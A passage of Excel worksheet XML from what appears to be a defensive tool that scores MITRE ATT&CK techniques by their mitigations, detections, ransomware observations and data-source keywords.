      </c>
      <c r="AE50" s="25">
        <f>IF(AD50="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF50" s="25" t="str" cm="1">
        <f t="array" ref="AF50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG50" s="25">
        <f>IF(AF50="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH50" s="25" t="str" cm="1">
        <f t="array" ref="AH50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI50" s="25">
        <f>IF(AH50="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ50" s="25" t="str" cm="1">
        <f t="array" ref="AJ50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK50" s="25">
        <f>IF(AJ50="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL50" s="25" t="str" cm="1">
        <f t="array" ref="AL50">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC50)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM50" s="25">
        <f>IF(AL50="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN50" s="60">
        <v>1</v>
      </c>
      <c r="AO50" s="51">
        <v>1</v>
      </c>
      <c r="AP50" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7032606650190488E-2</v>
      </c>
      <c r="AQ50" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14566424438952383</v>
      </c>
      <c r="AR50" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14566424438952383</v>
      </c>
      <c r="AS50" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT50" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU5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1" spans="1:47" ht="32.1">
      <c r="A51" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.02957612544762E-2</v>
      </c>
      <c r="B51" s="25">
        <f>SUM(H51,M51,V51)*(1+SUM(AE51,AG51,AI51,AK51,AM51))</f>
        <v>0.60295761254476199</v>
      </c>
      <c r="C51" s="25" t="s">
        <v>282</v>
      </c>
      <c r="D51" s="25" t="s">
        <v>283</v>
      </c>
      <c r="E51" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F51" s="51">
        <v>1</v>
      </c>
      <c r="G51" s="51">
        <v>6</v>
      </c>
      <c r="H51" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I51">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J51">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K51">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.6</v>
      </c>
      <c r="L51">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.6</v>
      </c>
      <c r="M51" s="44">
        <v>3.5029020000000001E-2</v>
      </c>
      <c r="N51" s="51">
        <v>0</v>
      </c>
      <c r="O51" s="51">
        <v>4</v>
      </c>
      <c r="P51" s="51">
        <v>1</v>
      </c>
      <c r="Q51" s="51">
        <v>0</v>
      </c>
      <c r="R51" s="52" t="s">
        <v>284</v>
      </c>
      <c r="S51" s="51">
        <v>5</v>
      </c>
      <c r="T51" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U51" s="51">
        <v>8</v>
      </c>
      <c r="V51" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W51">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X51">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y51">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z51">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA51">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB51">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC51" s="29" t="s">
        <v>285</v>
      </c>
      <c r="AD51" s="25" t="str" cm="1">
        <f t="array" ref="AD51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE51" s="25">
        <f>IF(AD51="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF51" s="25" t="str" cm="1">
        <f t="array" ref="AF51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG51" s="25">
        <f>IF(AF51="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH51" s="25" t="str" cm="1">
        <f t="array" ref="AH51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC51)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI51" s="25">
        <f>IF(AH51="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ51" s="25" t="str" cm="1">
        <f t="array" ref="AJ51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK51" s="25">
        <f>IF(AJ51="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL51" s="25" t="str" cm="1">
        <f t="array" ref="AL51">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC51)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM51" s="25">
        <f>IF(AL51="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN51" s="52">
        <v>0</v>
      </c>
      <c r="AO51" s="51">
        <v>0</v>
      </c>
      <c r="AP51" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.02957612544762E-2</v>
      </c>
      <c r="AQ51" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.20098587084825401</v>
      </c>
      <c r="AR51" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.20098587084825401</v>
      </c>
      <c r="AS51" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT51" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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2" spans="1:47" ht="32.1">
      <c r="A52" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6914414498285709E-2</v>
      </c>
      <c r="B52" s="25">
        <f>SUM(H52,M52,V52)*(1+SUM(AE52,AG52,AI52,AK52,AM52))</f>
        <v>0.2691441449828571</v>
      </c>
      <c r="C52" s="25" t="s">
        <v>286</v>
      </c>
      <c r="D52" s="25" t="s">
        <v>287</v>
      </c>
      <c r="E52" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F52" s="51">
        <v>1</v>
      </c>
      <c r="G52" s="51">
        <v>0</v>
      </c>
      <c r="H52" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I52">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J52">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K52">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L52">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M52" s="44">
        <v>3.1804079999999998E-2</v>
      </c>
      <c r="N52" s="51">
        <v>0</v>
      </c>
      <c r="O52" s="51">
        <v>0</v>
      </c>
      <c r="P52" s="51">
        <v>0</v>
      </c>
      <c r="Q52" s="51">
        <v>0</v>
      </c>
      <c r="R52" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S52" s="51">
        <v>5</v>
      </c>
      <c r="T52" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U52" s="51">
        <v>10</v>
      </c>
      <c r="V52" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W52">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X52">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y52">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z52">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA52">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB52">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC52" s="29" t="s">
        <v>290</v>
      </c>
      <c r="AD52" s="25" t="str" cm="1">
        <f t="array" ref="AD52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC52)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE52" s="25">
        <f>IF(AD52="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF52" s="25" t="str" cm="1">
        <f t="array" ref="AF52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG52" s="25">
        <f>IF(AF52="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH52" s="25" t="str" cm="1">
        <f t="array" ref="AH52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI52" s="25">
        <f>IF(AH52="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ52" s="25" t="str" cm="1">
        <f t="array" ref="AJ52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK52" s="25">
        <f>IF(AJ52="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL52" s="25" t="str" cm="1">
        <f t="array" ref="AL52">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC52)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM52" s="25">
        <f>IF(AL52="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN52" s="52">
        <v>0</v>
      </c>
      <c r="AO52" s="51">
        <v>0</v>
      </c>
      <c r="AP52" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6914414498285709E-2</v>
      </c>
      <c r="AQ52" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.9714714994285696E-2</v>
      </c>
      <c r="AR52" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.9714714994285696E-2</v>
      </c>
      <c r="AS52" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT52" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU5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3" spans="1:47" ht="32.1">
      <c r="A53" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.22301367346333334</v>
      </c>
      <c r="B53" s="25">
        <f>SUM(H53,M53,V53)*(1+SUM(AE53,AG53,AI53,AK53,AM53))</f>
        <v>0.56347006796666665</v>
      </c>
      <c r="C53" s="25" t="s">
        <v>291</v>
      </c>
      <c r="D53" s="25" t="s">
        <v>292</v>
      </c>
      <c r="E53" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F53" s="51">
        <v>1</v>
      </c>
      <c r="G53" s="51">
        <v>1</v>
      </c>
      <c r="H53" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I53">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J53">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K53">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L53">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M53" s="44">
        <v>2.8423609999999998E-2</v>
      </c>
      <c r="N53" s="51">
        <v>0</v>
      </c>
      <c r="O53" s="51">
        <v>4</v>
      </c>
      <c r="P53" s="51">
        <v>15</v>
      </c>
      <c r="Q53" s="51">
        <v>1</v>
      </c>
      <c r="R53" s="52" t="s">
        <v>293</v>
      </c>
      <c r="S53" s="51">
        <v>9</v>
      </c>
      <c r="T53" s="52" t="s">
        <v>294</v>
      </c>
      <c r="U53" s="51">
        <v>12</v>
      </c>
      <c r="V53" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29523809523809524</v>
      </c>
      <c r="W53">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X53">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y53">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z53">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>20</v>
      </c>
      <c r="AA53">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.2</v>
      </c>
      <c r="AB53">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="AC53" s="29" t="s">
        <v>295</v>
      </c>
      <c r="AD53" s="25" t="str" cm="1">
        <f t="array" ref="AD53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC53)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE53" s="25">
        <f>IF(AD53="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF53" s="25" t="str" cm="1">
        <f t="array" ref="AF53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC53)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG53" s="25">
        <f>IF(AF53="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH53" s="25" t="str" cm="1">
        <f t="array" ref="AH53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC53)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI53" s="25">
        <f>IF(AH53="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ53" s="25" t="str" cm="1">
        <f t="array" ref="AJ53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC53)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK53" s="25">
        <f>IF(AJ53="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL53" s="25" t="str" cm="1">
        <f t="array" ref="AL53">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC53)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM53" s="25">
        <f>IF(AL53="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN53" s="52">
        <v>5</v>
      </c>
      <c r="AO53" s="51">
        <v>1</v>
      </c>
      <c r="AP53" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.22301367346333334</v>
      </c>
      <c r="AQ53" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18782335598888888</v>
      </c>
      <c r="AR53" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18782335598888888</v>
      </c>
      <c r="AS53" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT53" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU5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4" spans="1:47" ht="32.1">
      <c r="A54" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.15292079034942857</v>
      </c>
      <c r="B54" s="25">
        <f>SUM(H54,M54,V54)*(1+SUM(AE54,AG54,AI54,AK54,AM54))</f>
        <v>0.5292079034942857</v>
      </c>
      <c r="C54" s="25" t="s">
        <v>296</v>
      </c>
      <c r="D54" s="25" t="s">
        <v>297</v>
      </c>
      <c r="E54" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F54" s="51">
        <v>1</v>
      </c>
      <c r="G54" s="51">
        <v>1</v>
      </c>
      <c r="H54" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I54">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J54">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K54">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L54">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M54" s="44">
        <v>2.745711E-2</v>
      </c>
      <c r="N54" s="51">
        <v>0</v>
      </c>
      <c r="O54" s="51">
        <v>3</v>
      </c>
      <c r="P54" s="51">
        <v>1</v>
      </c>
      <c r="Q54" s="51">
        <v>0</v>
      </c>
      <c r="R54" s="52" t="s">
        <v>298</v>
      </c>
      <c r="S54" s="51">
        <v>8</v>
      </c>
      <c r="T54" s="52" t="s">
        <v>299</v>
      </c>
      <c r="U54" s="51">
        <v>23</v>
      </c>
      <c r="V54" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W54">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X54">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y54">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z54">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA54">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB54">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC54" s="29" t="s">
        <v>300</v>
      </c>
      <c r="AD54" s="25" t="str" cm="1">
        <f t="array" ref="AD54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC54)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE54" s="25">
        <f>IF(AD54="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF54" s="25" t="str" cm="1">
        <f t="array" ref="AF54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC54)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG54" s="25">
        <f>IF(AF54="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH54" s="25" t="str" cm="1">
        <f t="array" ref="AH54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC54)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI54" s="25">
        <f>IF(AH54="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ54" s="25" t="str" cm="1">
        <f t="array" ref="AJ54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC54)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK54" s="25">
        <f>IF(AJ54="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL54" s="25" t="str" cm="1">
        <f t="array" ref="AL54">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC54)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM54" s="25">
        <f>IF(AL54="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN54" s="60">
        <v>3</v>
      </c>
      <c r="AO54" s="51">
        <v>1</v>
      </c>
      <c r="AP54" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.15292079034942857</v>
      </c>
      <c r="AQ54" s="25">
